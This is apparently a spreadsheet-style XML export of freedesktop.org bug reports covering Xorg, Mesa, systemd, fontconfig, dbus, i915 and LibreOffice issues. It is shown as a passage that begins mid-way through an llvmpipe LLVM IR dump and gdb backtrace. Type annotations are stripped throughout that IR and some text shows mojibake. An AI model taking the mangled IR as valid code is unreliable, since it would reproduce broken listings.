  %356 = shl  %347 
  %357 = and   %356
  %358 = or  %355 %357
  %359 = bitcast  %358 to 
  %360 = zext  %330 to 
  %361 = shl  %360 
  %362 = and  %361 
  %363 = bitcast  %362 to 
  %364 = fmul  %363 
  %365 = fcmp uge  %363 
  %366 = sext  %365 to 
  %367 = bitcast  %364 to 
  %368 = and   %366
  %369 = or  %368 %367
  %370 = shl  %361 
  %371 = and   %370
  %372 = or  %369 %371
  %373 = bitcast  %372 to 
  %374 = zext  %331 to 
  %375 = shl  %374 
  %376 = and  %375 
  %377 = bitcast  %376 to 
  %378 = fmul  %377 
  %379 = fcmp uge  %377 
  %380 = sext  %379 to 
  %381 = bitcast  %378 to 
  %382 = and   %380
  %383 = or  %382 %381
  %384 = shl  %375 
  %385 = and   %384
  %386 = or  %383 %385
  %387 = bitcast  %386 to 
  %388 = bitcast  %256 to 
  %389 = call  @llvm.x86.sse41.blendvps( %345  %dst0  %388)
  %390 = bitcast  %259 to 
  %391 = call  @llvm.x86.sse41.blendvps( %359  %dst1  %390)
  %392 = bitcast  %262 to 
  %393 = call  @llvm.x86.sse41.blendvps( %373  %dst015  %392)
  %394 = bitcast  %265 to 
  %395 = call  @llvm.x86.sse41.blendvps( %387  %dst116  %394)
  %396 = bitcast  %dst2 to 
  %397 = and  %396 %268
  %398 = xor  %268 
  %399 = and  zeroinitializer %398
  %400 = or  %397 %399
  %401 = bitcast  %400 to 
  %402 = bitcast  %dst3 to 
  %403 = and  %402 %271
  %404 = xor  %271 
  %405 = and  zeroinitializer %404
  %406 = or  %403 %405
  %407 = bitcast  %406 to 
  %408 = bitcast  %dst217 to 
  %409 = and  %408 %274
  %410 = xor  %274 
  %411 = and  zeroinitializer %410
  %412 = or  %409 %411
  %413 = bitcast  %412 to 
  %414 = bitcast  %dst318 to 
  %415 = and  %414 %277
  %416 = xor  %277 
  %417 = and  zeroinitializer %416
  %418 = or  %415 %417
  %419 = bitcast  %418 to 
  %420 = bitcast  %389 to 
  %421 = bitcast  %389 to 
  %422 = and  %421 
  %423 = bitcast  %422 to 
  %424 = fmul  %423 
  %425 = call  @llvm.x86.sse.min.ps( %424  )
  %426 = bitcast  %425 to 
  %427 = bitcast  %389 to 
  %428 = and  %427 
  %429 = bitcast  %428 to 
  %430 = bitcast  %429 to 
  %431 = icmp sgt  %430 
  %432 = sext  %431 to 
  %433 = icmp eq  %430 
  %434 = sext  %433 to 
  %435 = or  %432 %434
  %436 = and  %432 
  %437 = or   %436
  %438 = bitcast  %435 to 
  %439 = bitcast  %437 to 
  %440 = bitcast  %426 to 
  %441 = call  @llvm.x86.sse41.pblendvb( %440  %439  %438)
  %442 = bitcast  %441 to 
  %443 = and   %420
  %444 = lshr  %443 
  %445 = or  %444 %442
  %446 = ashr  %445 
  %447 = trunc  %446 to 
  %448 = bitcast  %391 to 
  %449 = bitcast  %391 to 
  %450 = and  %449 
  %451 = bitcast  %450 to 
  %452 = fmul  %451 
  %453 = call  @llvm.x86.sse.min.ps( %452  )
  %454 = bitcast  %453 to 
  %455 = bitcast  %391 to 
  %456 = and  %455 
  %457 = bitcast  %456 to 
  %458 = bitcast  %457 to 
  %459 = icmp sgt  %458 
  %460 = sext  %459 to 
  %461 = icmp eq  %458 
  %462 = sext  %461 to 
  %463 = or  %460 %462
  %464 = and  %460 
  %465 = or   %464
  %466 = bitcast  %463 to 
  %467 = bitcast  %465 to 
  %468 = bitcast  %454 to 
  %469 = call  @llvm.x86.sse41.pblendvb( %468  %467  %466)
  %470 = bitcast  %469 to 
  %471 = and   %448
  %472 = lshr  %471 
  %473 = or  %472 %470
  %474 = ashr  %473 
  %475 = trunc  %474 to 
  %476 = bitcast  %393 to 
  %477 = bitcast  %393 to 
  %478 = and  %477 
  %479 = bitcast  %478 to 
  %480 = fmul  %479 
  %481 = call  @llvm.x86.sse.min.ps( %480  )
  %482 = bitcast  %481 to 
  %483 = bitcast  %393 to 
  %484 = and  %483 
  %485 = bitcast  %484 to 
  %486 = bitcast  %485 to 
  %487 = icmp sgt  %486 
  %488 = sext  %487 to 
  %489 = icmp eq  %486 
  %490 = sext  %489 to 
  %491 = or  %488 %490
  %492 = and  %488 
  %493 = or   %492
  %494 = bitcast  %491 to 
  %495 = bitcast  %493 to 
  %496 = bitcast  %482 to 
  %497 = call  @llvm.x86.sse41.pblendvb( %496  %495  %494)
  %498 = bitcast  %497 to 
  %499 = and   %476
  %500 = lshr  %499 
  %501 = or  %500 %498
  %502 = ashr  %501 
  %503 = trunc  %502 to 
  %504 = bitcast  %395 to 
  %505 = bitcast  %395 to 
  %506 = and  %505 
  %507 = bitcast  %506 to 
  %508 = fmul  %507 
  %509 = call  @llvm.x86.sse.min.ps( %508  )
  %510 = bitcast  %509 to 
  %511 = bitcast  %395 to 
  %512 = and  %511 
  %513 = bitcast  %512 to 
  %514 = bitcast  %513 to 
  %515 = icmp sgt  %514 
  %516 = sext  %515 to 
  %517 = icmp eq  %514 
  %518 = sext  %517 to 
  %519 = or  %516 %518
  %520 = and  %516 
  %521 = or   %520
  %522 = bitcast  %519 to 
  %523 = bitcast  %521 to 
  %524 = bitcast  %510 to 
  %525 = call  @llvm.x86.sse41.pblendvb( %524  %523  %522)
  %526 = bitcast  %525 to 
  %527 = and   %504
  %528 = lshr  %527 
  %529 = or  %528 %526
  %530 = ashr  %529 
  %531 = trunc  %530 to 
  %532 = bitcast  %401 to 
  %533 = bitcast  %401 to 
  %534 = and  %533 
  %535 = bitcast  %534 to 
  %536 = fmul  %535 
  %537 = call  @llvm.x86.sse.min.ps( %536  )
  %538 = bitcast  %537 to 
  %539 = bitcast  %401 to 
  %540 = and  %539 
  %541 = bitcast  %540 to 
  %542 = bitcast  %541 to 
  %543 = icmp sgt  %542 
  %544 = sext  %543 to 
  %545 = icmp eq  %542 
  %546 = sext  %545 to 
  %547 = or  %544 %546
  %548 = and  %544 
  %549 = or   %548
  %550 = bitcast  %547 to 
  %551 = bitcast  %549 to 
  %552 = bitcast  %538 to 
  %553 = call  @llvm.x86.sse41.pblendvb( %552  %551  %550)
  %554 = bitcast  %553 to 
  %555 = and   %532
  %556 = lshr  %555 
  %557 = or  %556 %554
  %558 = ashr  %557 
  %559 = trunc  %558 to 
  %560 = bitcast  %407 to 
  %561 = bitcast  %407 to 
  %562 = and  %561 
  %563 = bitcast  %562 to 
  %564 = fmul  %563 
  %565 = call  @llvm.x86.sse.min.ps( %564  )
  %566 = bitcast  %565 to 
  %567 = bitcast  %407 to 
  %568 = and  %567 
  %569 = bitcast  %568 to 
  %570 = bitcast  %569 to 
  %571 = icmp sgt  %570 
  %572 = sext  %571 to 
  %573 = icmp eq  %570 
  %574 = sext  %573 to 
  %575 = or  %572 %574
  %576 = and  %572 
  %577 = or   %576
  %578 = bitcast  %575 to 
  %579 = bitcast  %577 to 
  %580 = bitcast  %566 to 
  %581 = call  @llvm.x86.sse41.pblendvb( %580  %579  %578)
  %582 = bitcast  %581 to 
  %583 = and   %560
  %584 = lshr  %583 
  %585 = or  %584 %582
  %586 = ashr  %585 
  %587 = trunc  %586 to 
  %588 = bitcast  %413 to 
  %589 = bitcast  %413 to 
  %590 = and  %589 
  %591 = bitcast  %590 to 
  %592 = fmul  %591 
  %593 = call  @llvm.x86.sse.min.ps( %592  )
  %594 = bitcast  %593 to 
  %595 = bitcast  %413 to 
  %596 = and  %595 
  %597 = bitcast  %596 to 
  %598 = bitcast  %597 to 
  %599 = icmp sgt  %598 
  %600 = sext  %599 to 
  %601 = icmp eq  %598 
  %602 = sext  %601 to 
  %603 = or  %600 %602
  %604 = and  %600 
  %605 = or   %604
  %606 = bitcast  %603 to 
  %607 = bitcast  %605 to 
  %608 = bitcast  %594 to 
  %609 = call  @llvm.x86.sse41.pblendvb( %608  %607  %606)
  %610 = bitcast  %609 to 
  %611 = and   %588
  %612 = lshr  %611 
  %613 = or  %612 %610
  %614 = ashr  %613 
  %615 = trunc  %614 to 
  %616 = bitcast  %419 to 
  %617 = bitcast  %419 to 
  %618 = and  %617 
  %619 = bitcast  %618 to 
  %620 = fmul  %619 
  %621 = call  @llvm.x86.sse.min.ps( %620  )
  %622 = bitcast  %621 to 
  %623 = bitcast  %419 to 
  %624 = and  %623 
  %625 = bitcast  %624 to 
  %626 = bitcast  %625 to 
  %627 = icmp sgt  %626 
  %628 = sext  %627 to 
  %629 = icmp eq  %626 
  %630 = sext  %629 to 
  %631 = or  %628 %630
  %632 = and  %628 
  %633 = or   %632
  %634 = bitcast  %631 to 
  %635 = bitcast  %633 to 
  %636 = bitcast  %622 to 
  %637 = call  @llvm.x86.sse41.pblendvb( %636  %635  %634)
  %638 = bitcast  %637 to 
  %639 = and   %616
  %640 = lshr  %639 
  %641 = or  %640 %638
  %642 = ashr  %641 
  %643 = trunc  %642 to 
  %644 = call  @llvm.x86.sse.min.ps( zeroinitializer  )
  %645 = bitcast  %644 to 
  %646 = and  %645 
  %647 = or  zeroinitializer %646
  %648 = or  zeroinitializer %647
  %649 = ashr  %648 
  %650 = trunc  %649 to 
  %651 = call  @llvm.x86.sse.min.ps( zeroinitializer  )
  %652 = bitcast  %651 to 
  %653 = and  %652 
  %654 = or  zeroinitializer %653
  %655 = or  zeroinitializer %654
  %656 = ashr  %655 
  %657 = trunc  %656 to 
  %658 = call  @llvm.x86.sse.min.ps( zeroinitializer  )
  %659 = bitcast  %658 to 
  %660 = and  %659 
  %661 = or  zeroinitializer %660
  %662 = or  zeroinitializer %661
  %663 = ashr  %662 
  %664 = trunc  %663 to 
  %665 = call  @llvm.x86.sse.min.ps( zeroinitializer  )
  %666 = bitcast  %665 to 
  %667 = and  %666 
  %668 = or  zeroinitializer %667
  %669 = or  zeroinitializer %668
  %670 = ashr  %669 
  %671 = trunc  %670 to 
  %672 = call  @llvm.x86.sse.min.ps( zeroinitializer  )
  %673 = bitcast  %672 to 
  %674 = and  %673 
  %675 = or  zeroinitializer %674
  %676 = or  zeroinitializer %675
  %677 = ashr  %676 
  %678 = trunc  %677 to 
  %679 = call  @llvm.x86.sse.min.ps( zeroinitializer  )
  %680 = bitcast  %679 to 
  %681 = and  %680 
  %682 = or  zeroinitializer %681
  %683 = or  zeroinitializer %682
  %684 = ashr  %683 
  %685 = trunc  %684 to 
  %686 = call  @llvm.x86.sse.min.ps( zeroinitializer  )
  %687 = bitcast  %686 to 
  %688 = and  %687 
  %689 = or  zeroinitializer %688
  %690 = or  zeroinitializer %689
  %691 = ashr  %690 
  %692 = trunc  %691 to 
  %693 = call  @llvm.x86.sse.min.ps( zeroinitializer  )
  %694 = bitcast  %693 to 
  %695 = and  %694 
  %696 = or  zeroinitializer %695
  %697 = or  zeroinitializer %696
  %698 = ashr  %697 
  %699 = trunc  %698 to 
  %700 = shufflevector  %447  %447  
  %701 = shufflevector  %475  %475  
  %702 = shufflevector  %503  %503  
  %703 = shufflevector  %531  %531  
  %704 = shufflevector  %559  %559  
  %705 = shufflevector  %587  %587  
  %706 = shufflevector  %615  %615  
  %707 = shufflevector  %643  %643  
  %708 = shufflevector  %650  %650  
  %709 = shufflevector  %657  %657  
  %710 = shufflevector  %664  %664  
  %711 = shufflevector  %671  %671  
  %712 = shufflevector  %678  %678  
  %713 = shufflevector  %685  %685  
  %714 = shufflevector  %692  %692  
  %715 = shufflevector  %699  %699  
  %716 = mul i32 0 %209
  %717 = add i32 0 %716
  %718 = getelementptr * %color_ptr0 i32 0 i32 %717
  %719 = bitcast i8* %718 to *
  store  %700 * %719 align 2
  %720 = mul i32 0 %209
  %721 = add i32 6 %720
  %722 = getelementptr * %color_ptr0 i32 0 i32 %721
  %723 = bitcast i8* %722 to *
  store  %701 * %723 align 2
  %724 = mul i32 0 %209
  %725 = add i32 12 %724
  %726 = getelementptr * %color_ptr0 i32 0 i32 %725
  %727 = bitcast i8* %726 to *
  store  %702 * %727 align 2
  %728 = mul i32 0 %209
  %729 = add i32 18 %728
  %730 = getelementptr * %color_ptr0 i32 0 i32 %729
  %731 = bitcast i8* %730 to *
  store  %703 * %731 align 2
  call void @llvm.x86.sse.ldmxcsr(i32* %mxcsr_ptr)
  ret void
}
src/gallium/auxiliary/gallivm/lp_bld_init.c:605:gallivm_verify_function: Assertion `0' failed.
(gdb) bt
#0  0x00007f1c5f7df609 in _debug_assert_fail (expr=0x7f1c602c8088 0 file=0x7f1c602c7fd0 src/gallium/auxiliary/gallivm/lp_bld_init.c line=605 
    function=0x7f1c602c8130  gallivm_verify_function) at src/gallium/auxiliary/util/u_debug.c:278
#1  0x00007f1c5f86719a in gallivm_verify_function (gallivm=0x15a7560 func=0x1511a80) at src/gallium/auxiliary/gallivm/lp_bld_init.c:605
#2  0x00007f1c5f44000c in generate_fragment (lp=0x9c08b0 shader=0xa0a2a0 variant=0x161ff80 partial_mask=1) at src/gallium/drivers/llvmpipe/lp_state_fs.c:2373
#3  0x00007f1c5f440b15 in generate_variant (lp=0x9c08b0 shader=0xa0a2a0 key=0x7fff901955d0) at src/gallium/drivers/llvmpipe/lp_state_fs.c:2542
#4  0x00007f1c5f4420f9 in llvmpipe_update_fs (lp=0x9c08b0) at src/gallium/drivers/llvmpipe/lp_state_fs.c:3089
#5  0x00007f1c5f438549 in llvmpipe_update_derived (llvmpipe=0x9c08b0) at src/gallium/drivers/llvmpipe/lp_state_derived.c:186
#6  0x00007f1c5f412dfc in llvmpipe_draw_vbo (pipe=0x9c08b0 info=0x7fff90195870) at src/gallium/drivers/llvmpipe/lp_draw_arrays.c:64
#7  0x00007f1c5f7e267b in util_draw_arrays_instanced (pipe=0x9c08b0 mode=6 start=0 count=4 start_instance=0 instance_count=1)
    at src/gallium/auxiliary/util/u_draw.h:99
#8  0x00007f1c5f7e5066 in blitter_draw (ctx=0x9fa570 x1=0 y1=0 x2=16 y2=1 depth=0 num_instances=1) at src/gallium/auxiliary/util/u_blitter.c:941
#9  0x00007f1c5f7e510f in util_blitter_draw_rectangle (blitter=0x9fa570 x1=0 y1=0 x2=16 y2=1 depth=0 type=UTIL_BLITTER_ATTRIB_TEXCOORD 
    attrib=0x7fff90195a40) at src/gallium/auxiliary/util/u_blitter.c:965
#10 0x00007f1c5f7e6631 in util_blitter_blit_generic (blitter=0x9fa570 dst=0x168</t>
  </si>
  <si>
    <t>XORG-6543</t>
  </si>
  <si>
    <t>No Sync on Dell Remote Access Console (DRAC4P) VGA port</t>
  </si>
  <si>
    <t>The DRAC appears to report that it has a DVI port but it only has a VGA port.
Attach a display to the VGA port and startup Xorg 6.9.0
With no xorg.conf file Xorg.0.log says:
 (II) RADEON(0): Primary:
     Monitor   -- TMDS
     Connector -- DVI-I
     DAC Type  -- TVDAC/ExtDAC
     TMDS Type -- Internal
     DDC Type  -- DVI_DDC
and there is no sync signal.
Create an xorg.conf file add the line:
If we put in  Option MonitorLayout CRT TMDS it reports:
   (II) RADEON(0): Connector0: DDCType-2 DACType-1 TMDSType-0
    ConnectorType-3
    (**) RADEON(0): MonitorLayout Option:
            Monitor1--Type CRT Monitor2--Type TMDS
    ...
    (II) RADEON(0): End of Monitor1 EDID data --------------------
    (II) RADEON(0): Primary:
     Monitor   -- CRT
     Connector -- DVI-I
     DAC Type  -- TVDAC/ExtDAC
     TMDS Type -- Internal
     DDC Type  -- DVI_DDC
Now the screen lights up. Notice that the report Monitor and Connector
above are contradictory.
On Xorg 6.8.2 the sync signal work fine it does not need the MonitorLayout 
option. Even so 6.8.2 reports Monitor -- TMDS
Last patch activity sponsored by Dell clusters around the July 2005 timeframe
on unrelated issues.</t>
  </si>
  <si>
    <t>PAPYON-26638</t>
  </si>
  <si>
    <t>Papyon should use python-crypto instead of embeded code</t>
  </si>
  <si>
    <t>Hi
papyon should maybe stop using embeded crypto code and use py-crypto
Ubuntu already patched it</t>
  </si>
  <si>
    <t>SYSTEMD-54501</t>
  </si>
  <si>
    <t>Typos in docs</t>
  </si>
  <si>
    <t>I going through all the documentation in man/ fixing typos and such. I also grep'ed the full source to catch similar typos elsewhere in the source.
A lot fixes like the the =&gt; the (manually checked each case of course). Also some changes from British behaviour to US behavior missing words etc etc.
I am not done yet but the patch is already close to 500 lines so I thought it would be nice to get some review before it gets even bigger.</t>
  </si>
  <si>
    <t>XORG-5595</t>
  </si>
  <si>
    <t>fbbits.h: dangerously uninitialized variable</t>
  </si>
  <si>
    <t>fbbits.h: In function 'fbPolySegment32':
fbbits.h:832: warning: 'bits' is used uninitialized in this function
fbbits.h: In function 'fbPolySegment24':
fbbits.h:832: warning: 'bits' is used uninitialized in this function
fbbits.h: In function 'fbPolySegment16':
fbbits.h:832: warning: 'bits' is used uninitialized in this function
fbbits.h: In function 'fbPolySegment8':
fbbits.h:832: warning: 'bits' is used uninitialized in this function
bits is first used as the target of a +=.</t>
  </si>
  <si>
    <t>XORG-81204</t>
  </si>
  <si>
    <t>[DRI3/Present: VB/HSW/BYT/BDW Bisected] Screen flicker when running low (&lt;60) FPS tests</t>
  </si>
  <si>
    <t>Platform: IVB/HSW/BYT/BDW
Libdrm: (master)libdrm-2.4.54-17-ge8c3c1358ecaf4e90f7d43762357ae6f8e2022b6
Mesa: (master)acaed8f41d3cf57092f3fe3a607b8069c72b57f1
Xserver: (master)xorg-server-1.15.99.902-121-g2f5cf9ff9a0f713b7e03863648
Xf86_video_intel:(master)2.99.912-227-g8587b2fff218537c6ff568ac3ef
Cairo: (master)8a605472d201e30ddcf3895d554cc4143cd54fb2
Libva: (master)c61d8c6ce9ffc27320e9e177c1e1123d5f1b5014
Libva_intel_driver:(master)c5cb17ea86f0065a939d3636dd26651c93d497c8
Kernel:(drm-intel-nightly)git-16025d
Bug detailed description:
----------------------------------------------
Screen flicker when running Synmark_v6_OglTexMem512 on IVB/HSW/BYT/BDW. The problem exists on gnome-session and Raw X. Itâ€™s Xserver regression. Please see dmesg.log and Xorg.0.log. 
By bisected show the first bad commit is :
commit 7ca458493aa2f0aa091c989ea0768611e0730bf5
Author:     Chris Wilson 
AuthorDate: Wed May 28 08:14:00 2014 +0100
Commit:     Keith Packard 
CommitDate: Mon Jun 2 13:11:18 2014 -0700
    xfree86: Report Present as a built-in module
Reproduce steps:
---------------------------------------------
1 xinit
2 ./synmark2 OglTexMem512</t>
  </si>
  <si>
    <t>MESA-94019</t>
  </si>
  <si>
    <t>[bisected] 3D acceleration broken with gallium/radeon: just get num_tile_pipes from the winsys</t>
  </si>
  <si>
    <t>Created attachment 121545
backtrace
Hi guys
If I have commit 'gallium/radeon: just get num_tile_pipes from the winsys' everything I try to run gives me /var/tmp/portage/media-libs/mesa-9999/work/mesa-9999/src/gallium/drivers/radeon/r600_texture.c:562: r600_texture_get_htile_size: Assertion `0' failed.
I've attached a gdb backtrace of the assert. I'm on a HD 7950 TAHITI.
Let me know if you need anything
sarnex</t>
  </si>
  <si>
    <t>sarnex</t>
  </si>
  <si>
    <t>FREEDESKTOP.ORG-36612</t>
  </si>
  <si>
    <t>Request for secrets.freedesktop.org and bugzilla</t>
  </si>
  <si>
    <t>The Secret Service API [1] is hosted at freedesktop.org [2] and discussed here too [3]. There are multiple implementations and there's a need for an official version online.
Could I get the virtual host 'secrets.freedesktop.org' and the following bugzilla category. It'll be used to host the specification and have a website about the spec.
User account: stefw
Project name: Secret Service API
Group name: secrets
Services needed: Web hosting
Approvals: 
Web host name: secrets.freedesktop.org
Description: Location for publishing the secret service specification.
Bugzilla: secret-service
Component: Specification
Component: Documentation
Thanks in advance!
[1] http://people.collabora.co.uk/~stefw/secret-service/
[2] http://cgit.freedesktop.org/xdg/xdg-specs/tree/secret-service
[3] http://lists.freedesktop.org/mailman/listinfo/authentication</t>
  </si>
  <si>
    <t>XORG-3385</t>
  </si>
  <si>
    <t>[PATCH] Fix xc/programs/Xserver/hw/xfree86/doc/man/Imakefile broken man page installation</t>
  </si>
  <si>
    <t>http://cvs.freedesktop.org/xorg/xc/programs/Xserver/hw/xfree86/doc/man/Imakefile?r1=1.2&amp;r2=1.3
broke the monolithic man page installation because
xc/doc/specs/programs/Imakefile still referred to the old locations. Patch
forthcoming.</t>
  </si>
  <si>
    <t>YTSTENUT-53212</t>
  </si>
  <si>
    <t>assorted fixes</t>
  </si>
  <si>
    <t>Patches on the way. They should hopefully be self-explanatory.</t>
  </si>
  <si>
    <t>MESA-37157</t>
  </si>
  <si>
    <t>[bisected] KDE KWin crashes on start with delayed BO mapping</t>
  </si>
  <si>
    <t>After updating the mesa today KWin started to crash/segfault on start. I've bisected and the first commmit that causes the crash is:
5e15497452cf3e4d2fc76fdc6ed8113d0891b467
r600g: delay mapping until first map request. (v2)
This is with KDE KWin 4.6.3 and on a laptop with integrated ATI Mobility Radeon HD 5470.
Later I've also tried with glxgears which appears to work fine if in window and crashes if started with -fullscreen option.</t>
  </si>
  <si>
    <t>XORG-1082</t>
  </si>
  <si>
    <t>Contrast problems in a dualhead enviroment</t>
  </si>
  <si>
    <t>Hi
Enviroment:
I have two TFTs connected to a Radeon 9600XT using the radeon driver.
Problem:
My first screen connected via a DVI2VGA converter at the DVI-I port has a very
weak contrast. (Second connected to the vga port is perfect)
Occurence:
Allways
Notes:
I think this is a bug inside the radeon driver during screen initialisation. I
think it falsely initializes my first screen as a DVI screen resulting in that
weak contrast.
I append my Xorg.log written during this session. Look especially out for lines
559-569. The screen with TMDS type NONE looks good (as mentioned the second
screen).</t>
  </si>
  <si>
    <t>raffaele</t>
  </si>
  <si>
    <t>FONTCONFIG-20411</t>
  </si>
  <si>
    <t>fontconfig doesn't match FreeDesktop directories specs</t>
  </si>
  <si>
    <t>i'm running Ubuntu Jaunty alpha and it seems that fontconfig places its configuration (or cache?) files in
/home/.fontconfig directory which doesn't match FreeDesktop directories specs :
The default for $XDG_CONFIG_HOME is $HOME/.config the default for
$XDG_DATA_HOME is $HOME/.local/share. So all applications should look for
those environment variables and use those default values if the variables
are not set.
This is quite important since it's not possible to easily backup config
&amp; data files if these files are not stored at the right place
See http://www.freedesktop.org/wiki/Specifications/basedir-spec
See also
http://ploum.frimouvy.org/?184-cleaning-user-preferences-keeping-user-data
(main post and comment#8)</t>
  </si>
  <si>
    <t>anti-stress</t>
  </si>
  <si>
    <t>XORG-54359</t>
  </si>
  <si>
    <t>X crashes after resume (8600GT / NV84)</t>
  </si>
  <si>
    <t>Created attachment 66458
The dmesg output
I have a NVIDIA GeForce 8600GT graphics card. I'm using Gentoo on a AMD64 machine with a custom built 3.5 kernel.
I've been using nouveau for more than a year by now without any kind of problems. Yet since I enabled the last kernel options I needed to get 3D hardware acceleration I'm having some issues.
When closing applications like web browsers or video players the X server suddenly hangs (I cannot even move the pointer) and after a few seconds it crashes and I see a TTY console. Then I think gdm tries to restart it and after a few seconds I have again some graphics on the screen which often is a corrupted image of what I was seeing before the crash. Then X crashes again gdm tries to restart it and so on.
When I'm on the TTYs I'm having some keyboard issues (keys double-typed or missed) but otherwise they work fine so I was able to log in and get some dmesg output and X logs which I'm attaching.
This issue only appears after I suspend and resume the PC. I can trigger this behavior almost at will after a resume but I'm not able to do it before. It also seems to be related to Xorg drivers and/or 3D since I didn't encounter it before activating hardware acceleration and it only affects the X server even after a restart while having no effect at all on TTYs.
If you need more detailed information just let me know.</t>
  </si>
  <si>
    <t>luca.wehrstedt</t>
  </si>
  <si>
    <t>DBUS-11001</t>
  </si>
  <si>
    <t>inlining of _dbus_verbose_init</t>
  </si>
  <si>
    <t>In dbus/dbus-internals.c there is a inlined function 
static inline void _dbus_verbose_init() 
This declaration form (static inline) isn't supported by msvc compiliers and removing of the inline statement is required. 
I assume that the inlining should speed up _dbus_is_verbose_real() calls. To have this feature the following patch includes _dbus_verbose_init() into _dbus_is_verbose_real() directly.</t>
  </si>
  <si>
    <t>DRI-76430</t>
  </si>
  <si>
    <t>[ILK Regression]Cairo_test causes X no response</t>
  </si>
  <si>
    <t>Created attachment 96143
dmesg
system Environment:
--------------------------
Platform: Ironlake
Kernel: drm-intel-nightly/2c0d38d786b40c51f9270c525d904a88eec70960
Bug detailed description:
-----------------------------
Run all Cairo_test X will be no response.
It happens on Ironlake with -queued and -nightly kernel. It doesn't happen on -fixes kernel.
The latest known good commit: e8e6e6012d68c4967e8f26fdd39ac95c247d4789
The latest known bad commit:  33688d95c458ffca6b247189cc6f15277fd6abf0
[  523.262914] Call Trace:
[  523.262933]  [] ? i915_gem_set_caching_ioctl+0x7d/0xbe [i915]
[  523.262968]  [] ? i915_gem_set_tiling+0x421/0x4fd [i915]
[  523.263000]  [] ? drm_ioctl+0x264/0x38d [drm]
[  523.263031]  [] ? i915_gem_object_set_cache_level+0x1cb/0x1cb [i915]
[  523.263065]  [] ? timerqueue_add+0x79/0x98
[  523.263090]  [] ? enqueue_hrtimer+0x15/0x37
[  523.263115]  [] ? __hrtimer_start_range_ns+0x238/0x256
[  523.263144]  [] ? timespec_add_safe+0x1e/0x4d
[  523.263170]  [] ? do_vfs_ioctl+0x3ec/0x435
[  523.263194]  [] ? SyS_ioctl+0x49/0x78
[  523.263218]  [] ? __audit_syscall_exit+0x209/0x225
[  523.263247]  [] ? system_call_fastpath+0x16/0x1b
[  523.263273] Code: 4a 01 00 00 48 8b 40 68 48 83 e8 68 48 8d 50 68 49 39 d4 75 e2 eb 3b 49 8b 45 30 f6 40 1c 20 74 0a 4d 8b 7f 68 49 83 ef 68 eb 2a  f6 47 20 20 74 ef 4c 89 f6 4c 89 ff e8 7e b7 ff ff 84 c0 75
[  523.263502] RIP  [] i915_gem_object_set_cache_level+0x75/0x1cb [i915]
[  523.263542]  RSP 
[  523.269979] ---[ end trace 9ab10df298350874 ]---</t>
  </si>
  <si>
    <t>XORG-27449</t>
  </si>
  <si>
    <t>[945] Large window corruption with 2.11 + 2.6.32.10</t>
  </si>
  <si>
    <t>Created attachment 34658
Screenshot
Hi
I am running Fedora 12 + updates testing and self-compiled intel-2.11 on an i945GM.
With 2.11 windows larger than 2048 pixels aren't rendered properly. Looks somehow tiling related. (screenshot attached)
- Clemens</t>
  </si>
  <si>
    <t>TELEPATHY-35659</t>
  </si>
  <si>
    <t>Improve tp_base_connection_change_status() and _disconnect_with_dbus_error() docs</t>
  </si>
  <si>
    <t>LIBREOFFICE-59437</t>
  </si>
  <si>
    <t>SwFmtAnchor::SetAnchor assert on loading a given document</t>
  </si>
  <si>
    <t>Created attachment 73123
Test document
When opening the test document LibO crashes.
Here's console output: http://pastebin.com/raw.php?i=X9k48aTu
This reproduces in Version 4.0.0.1+ and in 4.1.0.0alpha0+ but doesn't in 3.6.5.0+.</t>
  </si>
  <si>
    <t>MESA-48563</t>
  </si>
  <si>
    <t>Shader link hangs and fails on some shaders on sandybridge integrated gpu</t>
  </si>
  <si>
    <t>Created attachment 59809
The output of glxinfo on the machine where the problem happens
When running this webgl demo http://www.webgl.com/2012/04/webgl-demo-sunset-on-the-sea/ (direct link to the actual demo here: http://t.co/8yTh9GSI) firefox hangs for a long time (5 to 10 minutes). 
The stack trace from gdb says it happens in _mesa_glsl_link_shader 
#0  add_child (info=0x7fffb453b000 parent=0x7fffb9233dc0) at ralloc.c:88
#1  ralloc_size (ctx=0x7fffb9233df0 size=) at ralloc.c:111
#2  0x00007fffdb3a83a9 in ra_alloc_interference_graph (regs= count=6183) at program/register_allocate.c:291
#3  0x00007fffdb2c3e4a in fs_visitor::assign_regs (this=0x7ffffffe7650) at brw_fs_reg_allocate.cpp:212
#4  0x00007fffdb2ac786 in fs_visitor::run (this=0x7ffffffe7650) at brw_fs.cpp:1574
#5  0x00007fffdb2acce8 in brw_wm_fs_emit (brw=0x7fffb986c000 c=0x7fffc844b030 prog=0x7fffbc9d01e0) at brw_fs.cpp:1626
#6  0x00007fffdb290983 in do_wm_prog (brw=0x7fffb986c000 prog=0x7fffbc9d01e0 fp=0x7fffc5780000 key=0x7fffffff7c60) at brw_wm.c:232
#7  0x00007fffdb2ad4cd in brw_fs_precompile (ctx=0x7fffb986c000 prog=) at brw_fs.cpp:1708
#8  0x00007fffdb3fb38a in _mesa_glsl_link_shader (ctx=0x7fffb986c000 prog=0x7fffbc9d01e0) at program/ir_to_mesa.cpp:3285
#9  0x00007ffff37d2df4 in mozilla::gl::GLContext::fLinkProgram (this=0x7fffbc380800 program=178) at ../../../dist/include/GLContext.h:2345
(More stack frames follow...)
After a long time firefox comes back to life and the shader failed to build. The same shader works on other machines and freezing for more than 5 minutes seems way too long in my opinion (even though I agree that building webgl shaders on the main thread is probably not the best practice on firefox's side). 
Adapter Description: Tungsten Graphics Inc -- Mesa DRI Intel(R) Sandybridge Mobile 
Vendor ID: Tungsten Graphics Inc
Device ID: Mesa DRI Intel(R) Sandybridge 
Mobile Driver Version: 2.1 Mesa 7.11.2
WebGL Renderer: Tungsten Graphics Inc -- Mesa DRI Intel(R) Sandybridge Mobile  -- 2.1 Mesa 7.11.2
I attached the result of glxinfo if it can help.</t>
  </si>
  <si>
    <t>nsilva</t>
  </si>
  <si>
    <t>XORG-9985</t>
  </si>
  <si>
    <t>No blur on bottom or right borders</t>
  </si>
  <si>
    <t>I am using the blur plugin with the new blur options in gtk-window-decorator. The problem: although I do have blurring through the title bar and left-hand border of all windows there is no blurring for the bottom border or the right-hand border.
Using gconf I have specified blur_type=all and use_metacity_theme in /apps/gwd. I have unchecked the two _shade_opacity options. I have configured the blur plugin by checking alpha_blur and not focus_blur. I am using Gaussian blur with radius 6.0. The metacity theme is Silicon.</t>
  </si>
  <si>
    <t>LIBREOFFICE-72967</t>
  </si>
  <si>
    <t>EDITING UI: REGRESSION: Incorrect size in Â«Position and sizeÂ» dialogue for small objects</t>
  </si>
  <si>
    <t>Created attachment 91122
test document with a small rectangle
The Â«Position and sizeÂ» dialogue in LibreOffice Draw 4.2 can not shows size less than 10 mm in centimeters or millimeters units. It shows 1.00 cm or 10.00 mm for such objects
